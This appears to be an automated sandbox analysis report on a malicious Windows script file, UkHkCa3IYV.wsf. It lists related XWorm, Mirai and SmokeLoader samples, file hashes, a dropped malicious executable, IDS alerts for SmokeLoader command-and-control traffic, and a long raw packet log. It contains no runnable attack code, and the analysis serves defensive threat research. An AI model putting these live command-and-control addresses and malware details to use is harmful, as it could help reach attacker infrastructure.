                                                                                                                https://public-usa.mkt.dynamics.com/api/orgs/656e8c66-5e77-ef11-ac1e-6045bd080c27/r/lmUG5F4EgUesqGwuJA5PigEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fcrm.interactivaclic.com%252Fn%252F%253Fc3Y9bzM2NV8xX29uZSZyYW5kPVNUVjBVakk9JnVpZD1VU0VSMjMwOTIwMjRVMjYwOTIzMjE%253DN0123N%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=HTFuI1dWNsWznL3K1x2s1mvQbKix%2BdykwHJYfkmm7o4%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                                                                                                • 89.44.32.18
                                                                                                                cFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                                                                                • 83.147.55.182
                                                                                                                New_Document-660111409161.wsfGet hashmaliciousXWormBrowse
                                                                                                                • 83.147.55.182
                                                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 83.147.57.108
                                                                                                                F24_023.pdf (1).jsGet hashmaliciousUnknownBrowse
                                                                                                                • 83.147.53.197
                                                                                                                F24_023.pdf.jsGet hashmaliciousUnknownBrowse
                                                                                                                • 83.147.53.197
                                                                                                                F24_023.pdf.jsGet hashmaliciousUnknownBrowse
                                                                                                                • 83.147.53.197
                                                                                                                F24_023.pdf (1).jsGet hashmaliciousUnknownBrowse
                                                                                                                • 83.147.53.197
                                                                                                                No context
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\Users\user\AppData\Local\Temp\oBuf.exe3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                  RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    3388.PDF.htaGet hashmaliciousSmokeLoaderBrowse
                                                                                                                      C:\Users\user\AppData\Roaming\fbhbvci3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                        RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                          3388.PDF.htaGet hashmaliciousSmokeLoaderBrowse
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):9434
                                                                                                                            Entropy (8bit):4.928515784730612
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                            MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                            SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                            SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                            SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                            MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                            SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                            SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                            SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview:@...e.................................&..............@..........
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):222720
                                                                                                                            Entropy (8bit):6.497652873737398
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:cCLQUfn8SJGo/zUYkkf0ivpXYXgNTe58xVSlh+jMAEqLJwp:cCL3fnNMEzUpkbvpIMjMAcp
                                                                                                                            MD5:31059E7394B880F017E83804D9B716AB
                                                                                                                            SHA1:2C0057C276D7D2020D1E5A60CA6D44E2FB91674E
                                                                                                                            SHA-256:F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
                                                                                                                            SHA-512:A31E40888FC80CE8E138833155A63EDDC7EA9D4A37BCEB95A46E2CE937E42DFC74DF34FC9869F95940EE0F73D00F3A72839F220F09499B4F28AA1B91E5B706F9
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: 3312.PDF.wsf, Detection: malicious, Browse
                                                                                                                            • Filename: RmbF3635xY.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3388.PDF.hta, Detection: malicious, Browse
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L....`Ie.....................d....................@.........................................................................D...P....P.....................................................X........................................................text....~.......................... ..`.rdata.." ......."..................@..@.data...............................@....tls.........@......................@....rsrc.......P......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):222720
                                                                                                                            Entropy (8bit):6.497652873737398
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:cCLQUfn8SJGo/zUYkkf0ivpXYXgNTe58xVSlh+jMAEqLJwp:cCL3fnNMEzUpkbvpIMjMAcp
                                                                                                                            MD5:31059E7394B880F017E83804D9B716AB
                                                                                                                            SHA1:2C0057C276D7D2020D1E5A60CA6D44E2FB91674E
                                                                                                                            SHA-256:F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
                                                                                                                            SHA-512:A31E40888FC80CE8E138833155A63EDDC7EA9D4A37BCEB95A46E2CE937E42DFC74DF34FC9869F95940EE0F73D00F3A72839F220F09499B4F28AA1B91E5B706F9
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: 3312.PDF.wsf, Detection: malicious, Browse
                                                                                                                            • Filename: RmbF3635xY.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3388.PDF.hta, Detection: malicious, Browse
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L....`Ie.....................d....................@.........................................................................D...P....P.....................................................X........................................................text....~.......................... ..`.rdata.." ......."..................@..@.data...............................@....tls.........@......................@....rsrc.......P......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                            File type:Unicode text, UTF-8 text, with very long lines (1251), with CRLF line terminators
                                                                                                                            Entropy (8bit):4.805044745898158
                                                                                                                            TrID:
                                                                                                                              File name:UkHkCa3IYV.wsf
                                                                                                                              File size:224'986 bytes
                                                                                                                              MD5:0359edc4d2038de4660e733f5a80de94
                                                                                                                              SHA1:681e86b26771ff86c37d8cff72a60b3411f236e9
                                                                                                                              SHA256:62eb856a5f646c2883a3982f15c3eb877641f9e69783383ce8a73c688eccd543
                                                                                                                              SHA512:db9fb693f344155fabdcd2b11702a20022869f77b0b925b4067b121c6cd0c35a4b7ae93b4907cedd193e71cfca5c78d7b57a6b221f923d6234a9dc94e0d62549
                                                                                                                              SSDEEP:1536:DP4ANQd3mqQmBB10kZzt8zxcsw07HdB8S+OFPN6EZLS8+EqlbGDPp9RP4ANQd3m1:yBj5GsTwPMOS8+77Bj5GsTwPMOS8+O
                                                                                                                              TLSH:4924931E8B4B17F5432343D259CE6CE6EB24613CD35FE95478289F6C6212C2893BA8DD
                                                                                                                              File Content Preview:..Wikisource was created as a separate project on 24 November 2003, to host free textual sources as its aim in multiple languages and translations.....2004....In March 2000, the Nupedia project was started. Its intention was to publish articles written by
                                                                                                                              Icon Hash:68d69b8f86ab9a86
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-10-04T16:35:38.057425+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449730193.46.217.7880TCP
                                                                                                                              2024-10-04T16:36:29.436868+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449737193.46.217.7880TCP
                                                                                                                              2024-10-04T16:36:30.523268+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747188.40.141.21180TCP
                                                                                                                              2024-10-04T16:36:30.892140+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747188.40.141.21180TCP
                                                                                                                              2024-10-04T16:36:47.544969+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449842193.46.217.7880TCP
                                                                                                                              2024-10-04T16:36:47.910544+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747188.40.141.21180TCP
                                                                                                                              2024-10-04T16:36:48.298416+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747188.40.141.21180TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 4, 2024 16:35:35.812845945 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:35.817922115 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:35.818011045 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:35.818773985 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:35.824409008 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.057301998 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.057317019 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.057327986 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.057425022 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.148142099 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.148869991 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.148951054 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.219177008 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.219194889 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.219207048 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.219283104 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.219440937 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.219496012 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.281721115 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.282030106 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.282233000 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.397772074 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.397805929 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.397816896 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.397963047 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.398049116 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.398058891 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.398071051 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.398128033 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.398128033 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.398128986 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.398143053 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.398238897 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.398788929 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.398998976 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.399051905 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:38.488409042 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:38.532488108 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:39.301736116 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.301754951 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.301769972 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.301860094 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:39.392398119 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.392456055 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.392559052 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:39.478981018 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.478995085 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.479007959 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.479089975 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:39.479244947 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.479299068 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:39.569644928 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.569763899 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:39.569813013 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:40.571463108 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.571481943 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.571495056 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.571505070 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.571532965 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:40.571588993 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:40.571753979 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.571845055 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.571929932 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:40.580404043 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.580415964 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.580426931 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.580440044 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.580450058 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.580598116 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:40.580598116 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:40.791764021 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.791778088 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:40.791850090 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:41.508888960 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:41.508915901 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:41.508929968 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:41.509033918 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:41.509130955 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:41.509130955 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:41.599661112 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:41.599684954 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:41.599925995 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:42.424501896 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:42.424524069 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:42.424546957 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:42.424741030 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:42.470089912 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:42.515799046 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:42.516239882 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:42.516299963 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:42.616774082 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:42.616801977 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:42.616880894 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:43.058783054 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.059427023 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.059489012 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:43.532416105 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.533590078 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.533605099 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.533616066 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.533664942 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:43.533701897 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:43.660310984 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.661000967 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.661072969 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:43.784754992 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.785192966 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.785202980 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.785274982 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:43.786351919 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.786407948 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:43.958410025 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.958795071 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:43.959048033 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.240793943 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.241406918 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.241420031 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.241446018 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.241579056 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.241617918 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.241631031 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.241656065 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.241656065 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.241941929 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.241954088 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.241986036 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.244307995 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.244319916 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.244350910 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.246571064 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.246618032 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.257685900 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.257725000 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.258146048 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.298106909 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.359915018 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.360110998 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.360121012 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.360163927 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.361349106 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.361361027 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.361496925 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.407625914 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.450979948 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.451286077 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.451580048 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.598385096 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.598856926 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.598869085 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.598925114 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.600809097 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.600888014 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.791614056 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.792021990 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.792113066 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.792809010 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.793222904 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.793234110 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.793358088 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:44.794914961 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:44.794967890 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:45.039665937 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:45.039684057 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:45.039797068 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:45.610793114 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:45.610975027 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:45.610986948 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:45.611048937 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:45.701153040 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:45.701273918 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:45.701397896 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.000938892 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.001022100 CEST8049730193.46.217.78192.168.2.4
